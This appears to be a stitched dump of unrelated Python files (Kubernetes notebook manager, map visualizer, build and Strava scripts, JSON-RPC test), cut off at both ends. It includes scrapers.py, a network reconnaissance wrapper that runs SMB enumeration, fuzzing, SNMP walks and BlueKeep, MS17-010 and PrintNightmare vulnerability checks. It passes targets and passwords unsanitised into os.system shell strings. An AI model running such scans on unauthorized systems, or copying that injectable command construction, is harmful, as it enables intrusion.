pattern = re.compile(r"ttl-\d+")
if pattern.match(duration):
hours = int(duration.split("-")[1])
expiration_date = creation_ts + datetime.timedelta(hours=hours)
return expiration_date
except:
logger.error('Error getting expiration date for notebook %s in namespace %s' %(pod.metadata.name, namespace))
def get_creation_timestamp(pod):
creation_date = get_creation_date(pod)
if creation_date:
return creation_date.timestamp()
return -1
def get_expiration_timestamp(pod):
expiration_date = get_expiration_date(pod)
if expiration_date:
return expiration_date.timestamp()
return -1
def has_notebook_expired(pod):
exp_date = get_expiration_date(pod)
if exp_date:
return datetime.datetime.now(timezone.utc) > exp_date
return False
def get_hours_remaining(pod):
try:
exp_date = get_expiration_date(pod)
now_date = datetime.datetime.now(timezone.utc)
diff = exp_date - now_date
return int(diff.total_seconds() / 3600)
except:
logger.error('Error getting the hours remaining')
def get_pod_status(pod):
try:
if notebook_closing(pod):
return '--'
return pod.status.phase
except:
logger.error('Error getting status for pod %s' %pod.metadata.name)
def get_certificate_status(pod):
try:
if notebook_closing(pod):
return '--'
net = client.NetworkingV1Api()
notebook_name = pod.metadata.name
ingress = net.read_namespaced_ingress(notebook_name, namespace)
secretName = ingress.spec.tls[0].secret_name
objs = client.CustomObjectsApi()
cert = objs.get_namespaced_custom_object(group="cert-manager.io", version="v1", name=secretName, namespace=namespace, plural="certificates")
for condition in cert['status']['conditions']:
if condition['type'] == 'Ready':
return 'Ready' if condition['status'] == 'True' else 'Not ready'
return 'Unknown'
except:
logger.error("Error getting certificate status for notebook %s" %notebook_name)
def notebook_closing(pod):
try:
if pod.metadata.deletion_timestamp:
return True
return False
except:
logger.error('Error checking whether notebook is closing in pod %s' %pod.metadata.name)
def get_notebook_status(pod):
try:
pod_status = get_pod_status(pod)
cert_status = get_certificate_status(pod)
if notebook_closing(pod):
return 'Removing notebook...'
elif pod_status == 'Pending':
return 'Pod starting...'
elif cert_status != 'Ready':
return 'Waiting for certificate...'
elif pod_status == 'Running':
core_v1_api = client.CoreV1Api()
log = core_v1_api.read_namespaced_pod_log(pod.metadata.name, namespace=namespace)
if re.search("Jupyter Notebook.*is running at.*", log) or re.search("Jupyter Server.*is running at.*", log):
return 'Ready'
else:
return 'Notebook loading...'
else:
return pod_status
except:
logger.error('Error getting status for notebook %s' %pod.metadata.name)
return 'Error'
def get_detailed_status(pod):
try:
if notebook_closing(pod):
return None
detailed_status = ['', '', '', '']
for cond in pod.status.conditions:
if cond.type == 'PodScheduled' and cond.status == 'True':
detailed_status[0] = 'Pod scheduled.'
elif cond.type == 'Initialized' and cond.status == 'True':
detailed_status[1] = 'Pod initialized.'
elif cond.type == 'Ready' and cond.status == 'True':
detailed_status[2] = 'Pod ready.'
elif cond.type == 'ContainersReady' and cond.status == 'True':
detailed_status[3] = 'Containers ready.'
cert_status = get_certificate_status(pod)
if cert_status != 'Ready':
detailed_status.append('Waiting for certificate...')
nbstatus = get_notebook_status(pod)
if nbstatus == 'Notebook loading...':
detailed_status.append('Waiting for Jupyter notebook server...')
elif nbstatus == 'Ready':
detailed_status.append('Jupyter notebook server started.')
return detailed_status
except:
logger.error("Error getting detailed status for pod %s" %pod.metadata.name)
def get_token(notebook_name):
try:
api = client.CoreV1Api()
sec = api.read_namespaced_secret(notebook_name, namespace)
return sec.data['token']
except:
logger.error("Error getting secret for notebook %s" %notebook_name)
def get_display_name(pod):
try:
if hasattr(pod.metadata, 'labels') and 'display-name' in pod.metadata.labels:
return pod.metadata.labels['display-name']
return pod.metadata.name
except:
logger.error('Error getting value for display-name in pod %s' %pod.metadata.name)
def get_owner(pod):
try:
return pod.metadata.labels['owner']
except:
logger.error('Error getting value for owner in pod %s' %pod.metadata.name)
def get_url(pod):
try:
if notebook_closing(pod):
return None
api = client.NetworkingV1Api()
notebook_name = pod.metadata.name
ingress = api.read_namespaced_ingress(notebook_name, namespace)
token = get_token(notebook_name)
url = 'https://' + ingress.spec.rules[0].host + '?' + urllib.parse.urlencode({'token': token})
return url
except:
logger.error('Error getting URL for pod %s' %notebook_name)
def get_memory_request(pod):
try:
val = pod.spec.containers[0].resources.requests['memory']
return val[:-2] + ' GB'
except:
logger.error('Error getting the memory request for a pod')
def get_cpu_request(pod):
try:
return pod.spec.containers[0].resources.requests['cpu']
except:
logger.error('Error getting the CPU request for a pod')
def get_gpu_request(pod):
try:
return pod.spec.containers[0].resources.requests['nvidia.com/gpu']
except:
logger.error('Error getting the GPU request for a pod')
def get_gpu_memory_request(pod):
try:
val = float(pod.spec.node_selector['nvidia.com/gpu.memory'])/1000
return str(val) + ' GB'
except:
logger.error('Error getting the GPU memory request for a pod')
def get_pods():
try:
core_v1_api = client.CoreV1Api()
pods = core_v1_api.list_namespaced_pod(namespace)
return pods.items
except:
logger.error('Error getting pods')
return []
def get_pod(name):
try:
core_v1_api = client.CoreV1Api()
return core_v1_api.read_namespaced_pod(name, namespace)
except:
logger.info('Pod %s does not exist' %name)
return None
def get_user_pod(name, username):
try:
core_v1_api = client.CoreV1Api()
pod = core_v1_api.read_namespaced_pod(name, namespace)
if pod.metadata.labels['owner'] == username:
return pod
else:
logger.error('Pod %s is not owned by user %s' %(name, username))
return None
except:
logger.info('Pod %s does not exist' %name)
return None
def get_user_pods(username):
try:
user_pods = []
core_v1_api = client.CoreV1Api()
pods = core_v1_api.list_namespaced_pod(namespace)
for pod in pods.items:
try:
if pod.metadata.labels['owner'] == username:
user_pods.append(pod)
except:
logger.error('Error processing pod %s' %pod.metadata.name)
return user_pods
except:
logger.error('Error getting user pods')
return []
def get_notebooks(username):
user_pods = get_user_pods(username)
notebooks = []
for pod in user_pods:
try:
name = pod.metadata.name
display_name = get_display_name(pod)
url = get_url(pod)
creation_date = get_creation_timestamp(pod)
expiration_date = get_expiration_timestamp(pod)
pod_status = get_pod_status(pod)
cert_status = get_certificate_status(pod)
notebook_status = get_notebook_status(pod)
detailed_status = get_detailed_status(pod)
memory_request = get_memory_request(pod)
cpu_request = get_cpu_request(pod)
gpu_request = get_gpu_request(pod)
gpu_memory_request = get_gpu_memory_request(pod)
hours_remaining = get_hours_remaining(pod)
notebooks.append(
{'name': name,
'display_name': display_name,
'namespace': namespace,
'username': username,
'url': url,
'pod_status': pod_status,
'cert_status': cert_status,
'notebook_status': notebook_status,
'detailed_status': detailed_status,
'creation_date': creation_date,
'expiration_date': expiration_date,
'memory_request': memory_request,
'cpu_request': cpu_request,
'gpu_request': gpu_request,
'gpu_memory_request': gpu_memory_request,
'hours_remaining': hours_remaining}
)
except:
logger.error('Error processing Jupyter notebook %s' %pod.metadata.name)
return notebooks
def get_all_notebooks():
pods = get_pods()
notebooks = []
for pod in pods:
try:
name = pod.metadata.name
display_name = get_display_name(pod)
owner = get_owner(pod)
url = get_url(pod)
creation_date = get_creation_timestamp(pod)
expiration_date = get_expiration_timestamp(pod)
pod_status = get_pod_status(pod)
cert_status = get_certificate_status(pod)
notebook_status = get_notebook_status(pod)
memory_request = get_memory_request(pod)
cpu_request = get_cpu_request(pod)
gpu_request = get_gpu_request(pod)
gpu_memory_request = get_gpu_memory_request(pod)
hours_remaining = get_hours_remaining(pod)
notebooks.append(
{'name': name,
'display_name': display_name,
'namespace': namespace,
'username': owner,
'url': url,
'pod_status': pod_status,
'cert_status': cert_status,
'notebook_status': notebook_status,
'creation_date': creation_date,
'expiration_date': expiration_date,
'memory_request': memory_request,
'cpu_request': cpu_request,
'gpu_request': gpu_request,
'gpu_memory_request': gpu_memory_request,
'hours_remaining': hours_remaining}
)
except:
logger.error('Error processing Jupyter notebook %s' %pod.metadata.name)
return notebooks
def remove_notebook(notebook_id):
core_v1_api = client.CoreV1Api()
core_v1_api.delete_namespaced_pod(notebook_id, namespace)
core_v1_api.delete_namespaced_service(notebook_id, namespace)
networking_v1_api = client.NetworkingV1Api()
networking_v1_api.delete_namespaced_ingress(notebook_id, namespace)
core_v1_api.delete_namespaced_secret(notebook_id, namespace)
logger.info("Removing notebook %s in namespace %s" %(notebook_id, namespace))
def remove_user_notebook(notebook_name, username):
try:
notebook_id = notebook_name.lower()
core_v1_api = client.CoreV1Api()
networking_v1_api = client.NetworkingV1Api()
pod = core_v1_api.read_namespaced_pod(notebook_id, namespace)
if pod.metadata.labels['owner'] == username:
core_v1_api.delete_namespaced_pod(notebook_id, namespace)
core_v1_api.delete_namespaced_service(notebook_id, namespace)
networking_v1_api.delete_namespaced_ingress(notebook_id, namespace)
core_v1_api.delete_namespaced_secret(notebook_id, namespace)
logger.info('Removing notebook %s' %notebook_id)
else:
logger.warning('Notebook %s does not belong to user %s' %(notebook_id, username))
raise k8sException('Notebook %s does not belong to user %s' %(notebook_id, username))
except:
logger.error(f"Error removing pod {notebook_id} in namespace {namespace}")
raise k8sException('Error removing notebook %s' %notebook_id)
def get_autogenerated_notebook_name(username):
try:
for i in range(1, 100):
nbname = "{0}-notebook-{1}".format(username, i)
if notebook_id_available(nbname):
return nbname
except k8sException as e:
logger.error(str(e))
except:
logger.error("Error getting autogenerated notebook name")
|
__init__.py
|
import http.server
import json
import webbrowser
import socket
from abstractions import *
from utils import distance
def draw_map(centroids, restaurants, ratings):
"""Write a JSON file containing inputs and load a visualization.
Arguments:
centroids -- A sequence of positions
restaurants -- A sequence of restaurants
ratings -- A dictionary from restaurant names to ratings
"""
data = []
locations = set()
for restaurant in restaurants:
p = tuple(restaurant_location(restaurant))
cluster = min(enumerate(centroids), key=lambda v: distance(p, v[1]))[0]
name = restaurant_name(restaurant)
rating = ratings[name]
if p not in locations:
data.append({
'x': p[0],
'y': p[1],
'weight': rating,
'name': name,
'cluster': cluster,
})
locations.add(p)
with open('visualize/voronoi.json', 'w') as f:
json.dump(data, f)
load_visualization('voronoi.html')
port = 8000
base_url = 'http://localhost:{0}/visualize/'.format(port)
def load_visualization(url):
"""Load the visualization located at URL."""
if not check_port():
print('Address already in use! Check if recommend.py is running in a separate terminal.')
return
server = start_threaded_server()
webbrowser.open_new(base_url + url)
try:
server.join()
except KeyboardInterrupt:
print('\nKeyboard interrupt received, exiting.')
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
return
def check_port():
sock = socket.socket()
success = sock.connect_ex(('localhost', port))
sock.close()
return success
def start_server():
server, handler = http.server.HTTPServer, SilentServer
httpd = server(('', port), handler)
sa = httpd.socket.getsockname()
print('Serving HTTP on', sa[0], 'port', sa[1], '...')
print('Type Ctrl-C to exit.')
try:
httpd.serve_forever()
finally:
httpd.server_close()
import threading
def start_threaded_server():
thread = threading.Thread(target=start_server)
thread.daemon = True
thread.start()
return thread
|
scrapers.py
|
#!/usr/bin/env python3
from scanners import Job
from multiprocessing import Process, Queue
import os, sys, re, json
from os.path import join
import collections
from log import log
from helpers import dict2str
debug=True
def d(m):
if debug:
sys.stderr.write("> %s\n"%m)
# generic scrape job. is able to run a shell script against one target
# at a time, expecting the script to save something as 1.2.3.4.png
# and generates a results json file that can be then read
# and the filename pattern and command line can be overridden
class ScraperJob(Job):
def __init__(self, processes=4):
super().__init__()
self.path = 'results'
self.scantype = 'scraper'
# override
self.commandline = lambda scheme, target, port: target
self.setuphook = None # set to an argumentless lambda if necessary
self.posthook = None
self.output_filename_pattern = '([0-9.]+)\.png'
self.port = '-1'
self.scheme = ''
def scan(self):
d("scraper job targets %s"%str(self.targets))
if len(self.targets) == 0:
d("scraper job: no targets, not doing shit")
return
os.chdir(self.path) # the uuid id of the scan job
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
os.mkdir('output') # reasonable, don't change
if self.setuphook:
self.setuphook()
# be careful if changing the queue size. Some jobs, such as the rdp screenshot,
# create actual (offscreen) X11 windows that are then screenshot. Having more
# than one job in parallel can cause a fuckup.
targetqueue = Queue(maxsize = 1)
processes = []
def scrapetask(target):
targetqueue.put(target)
c=self.commandline(self.scheme, target, self.port)
d(c)
os.system(c)
if self.posthook:
self.posthook()
targetqueue.get()
for t in self.targets:
p = Process(target = lambda: scrapetask(t))
p.start()
processes.append(p)
for p in processes:
p.join()
self.postprocess()
sys.stderr.write("scraper task done\n")
def postprocess(self):
results = []
re_filename = re.compile(self.output_filename_pattern)
for x in os.listdir('output'):
m = re_filename.match(x)
if m and m.groups():
ip = m.groups()[0]
results.append({'host': ip, 'scantype': self.scantype,'port': self.port, 'file': join('output',x)})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': self.scantype,
'jobid': self.ident,
'target': self.targets }
if self.port != '-1':
meta['port'] = self.port
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
# simple enough job to be handled by the superclass
class RdpScreenshot(ScraperJob):
def __init__(self, targets, processes=4, domain=None, user=None, password=None):
super().__init__(processes)
self.targets = targets
d("rdpscreenshot u=%s d=%s p=%s targets %s"%(user,domain,password,str(self.targets)))
self.scantype='rdpscreenshot'
# run the rdp-screenshotter script with an offscreen window
if type(domain) == str and type(user) == str and type(password) == str\
and len(domain) > 0 and len(user) > 0:
self.commandline = lambda scheme, target, port: "timeout 15 xvfb-run -a ../../RDP-screenshotter.sh %s '%s' '%s' '%s'"%(target, domain, user, password)
else:
self.commandline = lambda scheme, target, port: "timeout 15 xvfb-run -a ../../RDP-screenshotter.sh %s"%(target)
self.output_filename_pattern = '([0-9.]+)\.png'
class VncScreenshot(ScraperJob):
def __init__(self, targets, port='5901', processes=4, password = ''):
super().__init__(processes)
self.targets = targets
self.scantype = 'vncscreenshot'
self.port = port
if type(domain) == str and type(user) == str and type(password) == str\
and len(domain) > 0 and len(user) > 0:
self.commandline = lambda scheme, target, port: "timeout 5 ../../scanners/vnc.py %s::%s %s output/%s.png "%(target, port, password, target)
else:
self.commandline = lambda scheme, target, port: "timeout 5 ../../scanners/vnc.py %s::%s output/%s.png "%(target, port, target)
self.output_filename_pattern = '([0-9.]+)\.png'
class WebScreenshot(ScraperJob):
def __init__(self, targets, scheme, port, processes=4):
super().__init__(processes)
self.targets = targets
self.port = port
self.scheme = scheme
d("webscreenshot targets %s"%str(self.targets))
self.path = 'results'
self.scantype='webscreenshot'
self.targets = targets
self.commandline = lambda scheme, target, port: "QT_QPA_PLATFORM=offscreen webscreenshot -r phantomjs %s://%s:%s >/dev/null 2>&1"%(scheme,target,port)
self.commandline = lambda scheme, target, port: 'mkdir -p screenshots;timeout 5 xvfb-run -a phantomjs --ignore-ssl-errors=true --ssl-protocol=any "/usr/local/lib/python3.8/dist-packages/webscreenshot/webscreenshot.js" url_capture=%s://%s:%s output_file="screenshots/%s_%s_%s.png" width=1200 height=800 format=png quality=75 ajaxtimeout=1400 maxtimeout=1800'%(scheme, target, port, scheme, target, port)
self.output_filename_pattern = '([a-z]+)_([0-9.]+)_([0-9]+).png'
# overridden here because of the different path and different regex to match results files
def postprocess(self):
results = []
re_filename = re.compile(self.output_filename_pattern)
for x in os.listdir('screenshots'):
m = re_filename.match(x)
if m and m.groups():
ip = m.groups()[1]
port = m.groups()[2]
results.append({'host': ip, 'scantype': 'web-screenshot', 'port': port, 'file': join('screenshots',x)})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'webscreenshot',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class SmbEnum(ScraperJob):
def __init__(self, targets, processes=4, domain=None, user=None, password=None):
super().__init__(targets)
self.path = 'results'
self.scantype='smbenum'
self.targets = targets
self.port = '445'
if type(domain) == str and type(user) == str and type(password) == str\
and len(domain) > 0 and len(user) > 0:
self.commandline = lambda scheme, target, port:\
"../../scanners/smbenum.sh -a %s %s %s %s"%\
(domain,user,password, target)
else:
self.commandline = lambda scheme, target, port:\
"../../scanners/smbenum.sh %s"%\
(target)
self.output_filename_pattern = 'out\.enum\.([0-9.]+)'
class Ffuf(ScraperJob):
def __init__(self, targets, processes=4, port='80'):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='ffuf'
self.targets = targets
self.port = port
self.output_filename_pattern = 'out\.ffuf\.([0-9.]+)'
def scan(self, scheme='http'):
self.scheme = scheme
if self.port == '443':
self.scheme = 'https'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
os.mkdir('output')
targetqueue = Queue(maxsize = 8)
processes = []
def enumtask(target):
targetspec = self.scheme + '://'
targetspec += target
if self.port:
targetspec += ':%s'%self.port
targetspec += '/FUZZ'
targetqueue.put(target)
# replace the quickhits with your wordlist of choice
c="ffuf -mc 200,204,307,418 -w ../../resources/quickhits.txt -u %s -o output/out.ffuf.%s 2>output/err.%s"%(targetspec, target, target)
sys.stderr.write('%s\n'%c)
os.system(c)
targetqueue.get()
for t in self.targets:
p = Process(target = lambda: enumtask(t))
p.start()
processes.append(p)
for p in processes:
p.join()
self.postprocess()
sys.stderr.write("ffuf task done\n")
def postprocess(self):
results = []
re_filename = re.compile('out\.ffuf\.([0-9.]+)')
for x in os.listdir('output'):
m = re_filename.match(x)
if m and m.groups():
ip = m.groups()[0]
fuf = json.loads(open('output/%s'%x,'r').read())
results.append({'host': ip, 'scantype': 'ffuf', 'port': self.port, 'output': fuf})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'ffuf',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Snmpwalk(ScraperJob):
def __init__(self, targets, processes=4):
super().__init__()
self.path = 'results'
self.scantype='snmpwalk'
self.targets = targets
self.port = '161'
self.commandline = lambda scheme, target, port: \
"snmpwalk -c public -v1 %s 2>output/err.%s | tee output/out.snmpwalk.%s"%\
(target, target, target)
self.output_filename_pattern = 'out\.snmpwalk\.([0-9.]+)'
class Bluekeep(ScraperJob):
def __init__(self, targets, processes=4):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='bluekeep'
self.targets = targets
def scan(self):
self.port = '3389'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
targetqueue = Queue(maxsize = 8)
os.system('../../scanners/blue.sh %s |tee output.txt'%' '.join(self.targets))
self.postprocess()
sys.stderr.write("bluekeep task done\n")
def postprocess(self):
results = []
#line looks like:
# [*] 192.168.9.5:3389 - Cannot reliably check exploitability.
re_shit = re.compile('\[.\]\s([^:]*):[0-9]+\s+-\s(.*)')
for line in open('output.txt','r').readlines():
m = re_shit.match(line.strip())
if m and m.groups():
results.append({'host': m.groups()[0], 'scantype': 'bluekeep', 'status': m.groups()[1], 'port': '3389'})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'bluekeep',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Ms17_010(ScraperJob):
def __init__(self, targets, processes=4):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='ms17_010'
self.targets = targets
def scan(self):
self.port = '445'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
targetqueue = Queue(maxsize = 8)
commandline = '../../scanners/ms17_010.sh %s > output.txt'%' '.join(self.targets)
log(commandline)
os.system(commandline)
self.postprocess()
sys.stderr.write("ms17_010 task done\n")
def postprocess(self):
results = []
#line looks like:
# [*] 192.168.9.5:3389 - Cannot reliably check exploitability.
re_shit = re.compile('\[.\]\s([^:]*):[0-9]+\s+-\s(.*)')
hostresults = collections.defaultdict(list)
for line in open('output.txt','r').readlines():
m = re_shit.match(line.strip())
if m and m.groups():
hostresults[m.groups()[0]].append(m.groups()[1])
for key in hostresults.keys():
results.append({'host': key, 'scantype': 'ms17_010', 'status': ''.join(hostresults[key]), 'port': self.port})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'ms17_010',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Ms12_020(ScraperJob):
def __init__(self, targets, processes=4):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='ms12_020'
self.targets = targets
def scan(self):
self.port = '3389'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
targetqueue = Queue(maxsize = 8)
commandline = '../../scanners/ms12_020.sh %s > output.txt'%' '.join(self.targets)
log(commandline)
os.system(commandline)
self.postprocess()
sys.stderr.write("ms12_020 task done\n")
def postprocess(self):
results = []
#line looks like:
# [*] 192.168.9.5:3389 - Cannot reliably check exploitability.
re_shit = re.compile('\[.\]\s([^:]*):[0-9]+\s+-\s(.*)')
hostresults = collections.defaultdict(list)
for line in open('output.txt','r').readlines():
m = re_shit.match(line.strip())
if m and m.groups():
hostresults[m.groups()[0]].append(m.groups()[1])
for key in hostresults.keys():
results.append({'host': key, 'scantype': 'ms12_020', 'status': ''.join(hostresults[key]), 'port': self.port})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'ms12_020',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Printnightmare(ScraperJob):
def __init__(self, targets, processes=4, domain=None, user=None, password=None):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='cve_2021_1675'
self.targets = targets
self.domain = domain
self.user = user
self.password = password
def scan(self):
self.port = '445'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
targetqueue = Queue(maxsize = 8)
commandline = '../../scanners/printnightmare.sh %s %s %s %s > output.txt'%(self.domain, self.user, self.password, ' '.join(self.targets))
log(commandline)
os.system(commandline)
self.postprocess()
sys.stderr.write("cve_2021_1675 task done\n")
def postprocess(self):
results = []
#line looks like:
# [*] 192.168.9.5:3389 - Cannot reliably check exploitability.
re_shit = re.compile('\[.\]\s([^:]*):[0-9]+\s+-\s(.*)')
hostresults = collections.defaultdict(list)
for line in open('output.txt','r').readlines():
m = re_shit.match(line.strip())
if m and m.groups():
hostresults[m.groups()[0]].append(m.groups()[1])
for key in hostresults.keys():
results.append({'host': key, 'scantype': 'cve_2021_1675', 'status': '\n'.join(hostresults[key]), 'port': self.port})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'cve_2021_1675',
'jobid': self.ident,
'target': self.targets,
'domain': self.domain,
'user': self.user,
'pass': 'redacted',
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Wappalyzer(ScraperJob):
def __init__(self, targets, scheme='http', port='80', processes=4):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='wappalyzer'
self.targets = targets
self.scheme = scheme
self.port = port
def scan(self):
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
os.mkdir('output')
targetqueue = Queue(maxsize = 8)
commandline = "/bin/bash -c 'for x in %s ; do wappalyzer %s://$x:%s > output/$x ; done'"%\
(' '.join(self.targets), self.scheme, self.port)
log(commandline)
os.system(commandline)
self.postprocess()
sys.stderr.write("wappalyzer task done\n")
def postprocess(self):
results = []
for x in os.listdir('output'):
j = json.loads(open(os.path.join('output', x), 'r').read())
open(os.path.join('output', x+'.txt'),'w').write(dict2str(j))
results.append({'host': x, 'scantype': 'wappalyzer', 'file': os.path.join('output', x+'.txt'), 'port': self.port})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'wappalyzer',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
|
build.py
|
import os, subprocess, threading;
sVSCommonTools = os.environ.get("VS120COMNTOOLS", None);
assert os.path.isdir(sVSCommonTools), "Cannot find Visual Studio";
gsIDEPath = os.path.normpath(os.path.join(sVSCommonTools, "..", "IDE"));
assert os.path.isdir(gsIDEPath), "Cannot find Visual Studio IDE";
gsWDExpressPath = os.path.join(gsIDEPath, "WDExpress.exe");
assert os.path.isfile(gsWDExpressPath), "Cannot find WDExpress.exe";
giErrorCount = 0;
def build(sFolderPath, sFileName, sPlatform, sConfig):
global giErrorCount;
oOutputLock.acquire();
print "Building %s (%s, %s)..." % (sFileName, sPlatform, sConfig);
oOutputLock.release();
sFilePath = os.path.join(sFolderPath, sFileName);
iTryCount = 1;
while iTryCount <= 2:
asCommandLine = [gsWDExpressPath, sFilePath, "/build"];
if sConfig:
asCommandLine.append(sPlatform and "%s|%s" % (sConfig, sPlatform) or sConfig);
oProcess = subprocess.Popen(asCommandLine, executable = gsWDExpressPath);
iReturnCode = oProcess.wait();
if iReturnCode == 1:
iTryCount += 1;
else:
break;
oOutputLock.acquire();
if iReturnCode != 0:
print "Build %s (%s, %s) failed! Error code: %d" % (sFileName, sPlatform, sConfig, iReturnCode);
giErrorCount += 1;
else:
print "Build %s (%s, %s) success!" % (sFileName, sPlatform, sConfig);
oOutputLock.release();
if __name__ == "__main__":
import sys;
sCWD = os.getcwd();
os.chdir(gsIDEPath);
oOutputLock = threading.Lock();
aoThreads = [];
sFolderPath = os.path.dirname(__file__);
for sFileName in os.listdir(sFolderPath):
sFilePath = os.path.join(sFolderPath, sFileName);
if sFileName[-4:].lower() == ".sln" and os.path.isfile(sFilePath):
for sConfig in ["Debug", "Release"]:
for sPlatform in ["Win32", "x64"]:
oThread = threading.Thread(target = build, args = (sFolderPath, sFileName, sPlatform, sConfig));
oThread.start();
aoThreads.append(oThread);
for oThread in aoThreads:
oThread.join();
os.chdir(sCWD);
if giErrorCount > 0:
raw_input("Press ENTER to exit...");
|
strava.py
|
#!/home/luca/dev/tools/miniconda3/envs/pyscripts/bin/python
import http.server
import os
import socketserver
import webbrowser
from datetime import datetime
from multiprocessing import Process
from time import sleep
from urllib.parse import urlsplit, parse_qs
from stravalib import Client
class LogHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, request, client_address, server):
super().__init__(request, client_address, server)
self._server = None
def do_GET(self):
query = urlsplit(self.path).query
params = parse_qs(query)
if 'code' in params:
code = params['code'][0]
print(code)
with open(".strava", 'w') as f:
f.write(code)
self.send_response(http.HTTPStatus.OK)
self.end_headers()
self.wfile.write(b'ok. code caught')
_srv = self._server
def _close():
print("Ready to close...")
sleep(5)
print("Closing...")
_srv.shutdown()
print("closed...")
Process(target=_close).start()
else:
self.send_response(http.HTTPStatus.BAD_REQUEST)
self.end_headers()
self.wfile.write(b'Sorry, code not found')
def auth_server():
port = 8080
handler = LogHandler
with socketserver.TCPServer(("", port), handler) as httpd:
print("serving at port", port)
handler._server = httpd
httpd.serve_forever()
def get_token(force=False):
if force:
os.remove('.strava')
# TODO file must be placed in user directory or script directory
if not os.path.exists('.strava'):
Process(target=auth_server).start()
sleep(5)
print('woke up')
webbrowser.open(client.authorization_url(client_id=CLIENT_ID,
redirect_uri='http://localhost:8080/authorized',
scope="view_private,write"))
while not os.path.exists('.strava'):
print("wait...")
sleep(2)
with open('.strava', 'r') as f:
code = f.readline()
return client.exchange_code_for_token(client_id=CLIENT_ID, client_secret=CLIENT_SECRET, code=code)
def _add_month(date):
m = date.month + 1
if m > 12:
m = 1
y = date.year + 1
else:
y = date.year
return datetime(year=y, month=m, day=date.day)
def collect_activities(flt=None, flt_collectors=None, collectors=None):
filtered_activities = list()
start_date = datetime(2013, 1, 1)
while start_date < datetime.now():
end_date = _add_month(start_date)
for activity in client.get_activities(before=end_date, after=start_date):
if flt and flt(activity):
filtered_activities.append(activity)
if flt_collectors:
for c in flt_collectors:
c(activity)
if collectors:
for c in collectors:
c(activity)
start_date = _add_month(start_date)
return filtered_activities
def update_wrong_gear():
get_token()
all_gears = set()
gears = set()
types = set()
distances = set()
activities = collect_activities(flt=lambda _a: _a.gear_id == 'g2284462' and _a.start_date.year < 2017,
flt_collectors=[lambda _a: types.add(_a.type),
lambda _a: distances.add(float(_a.distance)),
lambda _a: gears.add(_a.gear_id),
],
collectors=[lambda _a: all_gears.add(_a.gear_id)])
print("total activities: %i" % len(activities))
print("total distance: %f" % sum(distances, 0))
print("types: " + str(types))
print("all gears: " + str(all_gears))
print("gears: " + str(gears))
for a in activities:
print("Updating id: %i; date %s; type %s " % (a.id, str(a.start_date), a.type))
client.update_activity(a.id, gear_id="g1498034")
print("Done.")
CLIENT_ID = 99999
CLIENT_SECRET = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
token = None
client = Client()
if __name__ == '__main__':
update_wrong_gear()
|
test_jsonrpc.py
|
# Copyright (c) 2006-2007 Open Source Applications Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def make_server(host='localhost', port=4325):
from wsgiref import simple_server
from windmill.dep import wsgi_jsonrpc
class Methods(object):
def test_1(self):
return u'test_1'
def test_2(self, value):
return value
methods = Methods()
def test_3():
return 'test3'
application = wsgi_jsonrpc.WSGIJSONRPCApplication(instance=methods, methods=[test_3])
return simple_server.make_server(host, port, application)
def test_jsonrpc_server(uri='http://localhost:4325/'):
from windmill.dep import wsgi_jsonrpc
json_tools = wsgi_jsonrpc.json_tools
jsonrpc_client = json_tools.ServerProxy(uri=uri)
assert jsonrpc_client.test_1() == {u'result':u'test_1'}
assert jsonrpc_client.test_2({'test':4}) == {u'result':{'test':4}}
assert jsonrpc_client.test_3() == {u'result':u'test3'}
if __name__ == "__main__":
import sys
from threading import Thread
run = True
try:
